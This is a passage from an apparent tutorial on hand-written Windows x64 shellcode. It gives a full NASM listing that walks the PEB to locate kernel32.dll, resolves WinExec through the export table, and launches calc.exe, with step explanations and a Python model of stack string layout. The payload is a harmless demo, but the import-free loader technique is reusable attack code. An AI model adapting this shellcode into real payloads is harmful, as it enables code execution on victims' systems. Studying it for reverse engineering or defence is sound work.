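mov rax, 0x6578652e636c6163 ; "calc.exe" as one little-endian qword
push rax ; rsp now points to "calc.exe\0"
In 64-bit mode every push writes 8 bytes, and push imm32 sign-extends its operand to 64 bits. Pushing ".exe" and "calc" as two 32-bit immediates would therefore leave four zero bytes between the halves, and rsp would point to just "calc". Loading all eight characters into a register and pushing it once gives the contiguous string "calc.exe".
2. Setup Arguments for WinExec
mov rcx, rsp
Why:
- On Windows x64, the first argument to a function is passed in RCX.
- rcx = rsp now points to the string calc.exe (first argument to WinExec).
inc edx ; rdx = 1 → SW_SHOWNORMAL
Why:
- rdx was cleared in step 1 and is now 1. This is the second argument to WinExec, which expects:
UINT uCmdShow = 1; // SW_SHOWNORMAL
3. Shadow Space Allocation
sub rsp, 40
Windows x64 calling convention requires 32 bytes of shadow space, plus 8 bytes for alignment. The space is reserved after the string is built, so the callee's shadow space sits below the string and cannot overwrite it. This assumes RSP % 16 == 8 when the shellcode starts (as it is right after a call); if that is not guaranteed, align explicitly with and rsp, -16 and then reserve the shadow space with sub rsp, 0x20.
4. Call WinExec
call r9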
Done! You've just launched calc.exe using raw shellcode: no imports, no API stubs, just pure reverse engineering.
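How a string ends up laid out on the stack depends on the width of each push, and that is worth checking before trusting it. The Python sketch below models the stack as a byte string whose first byte is the byte at rsp. The helpers push_imm32, push_qword and c_string_at_top are invented names; the model relies only on the fact that a 64-bit push always writes 8 bytes and that push imm32 sign-extends its operand.

```python
import struct


def push_imm32(stack, imm32):
    """Model 64-bit `push imm32`: sign-extend to 8 bytes, new top of stack first."""
    value = imm32 - (1 << 32) if imm32 & 0x80000000 else imm32
    return struct.pack("<q", value) + stack


def push_qword(stack, value):
    """Model `push r64` with the register holding `value`."""
    return struct.pack("<Q", value) + stack


def c_string_at_top(stack):
    """The C string a callee would read starting at rsp."""
    return stack.split(b"\0", 1)[0]


# Two 32-bit immediates: ".exe" first, then "calc".
two_pushes = push_imm32(push_imm32(b"", 0x6578652E), 0x636C6163)
print(two_pushes, c_string_at_top(two_pushes))

# A zero qword as terminator, then all eight characters in one qword.
one_qword = push_qword(push_qword(b"", 0), 0x6578652E636C6163)
print(one_qword, c_string_at_top(one_qword))
```

Comparing the two results shows why the width of the push matters when a string is longer than four characters.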
Complete Code:
section .text
global _start
_start:
xor rcx , rcx
mov rbx , [gs:rcx + 0x60] ; PEB (NASM puts the segment override inside the brackets)
mov rbx , [rbx + 0x18]
mov rbx , [rbx + 0x20]
mov rbx , [rbx]
mov rbx , [rbx]
mov r8 , [rbx + 0x20]
; r8 = kernel32.dll
mov edx , [r8 + 0x3c]
lea rdx , [rdx + r8]
xor ecx , ecx
mov cl , 0x88
mov edx , [rdx + rcx]
lea rdx , [rdx + r8]
mov esi , [rdx + 0x20]
lea rsi , [rsi + r8]
;rdx = VA of Export Table, rsi = VA of AddressOfNames array
xor rcx , rcx
Find_next:
mov eax , [rsi + rcx * 4]
add rax , r8
cmp dword [rax] , 0x456e6957
jnz next
cmp word [rax + 4] , 0x6578
jnz next
cmp byte [rax + 6] , 0x63
jnz next
jmp found
next:
inc rcx
jmp Find_next
found:
;get ordinal table
mov esi , [rdx + 0x24]
add rsi , r8
movzx ecx , word [rsi + rcx * 2]
;Get address of WinExec
mov esi , [rdx + 0x1c]
movsxd rsi , esi
add rsi , r8
mov eax, [rsi + rcx * 4]
movsxd r9 , eax
add r9 , r8
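;r9 : address of WinExec
xor edx , edx
push rdx ; null terminator (8 zero bytes)
mov rax , 0x6578652e636c6163 ; "calc.exe" as one little-endian qword
push rax ; rsp -> "calc.exe\0"
mov rcx , rsp ; lpCmdLine
inc edx ; uCmdShow = 1 (SW_SHOWNORMAL)
sub rsp , 40 ; shadow space + alignment, reserved below the string
call r9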
With the kernel32.dll base address in hand, the shellcode traverses the PE structure to reach the Export Table, which is the key to resolving WinAPI functions at runtime.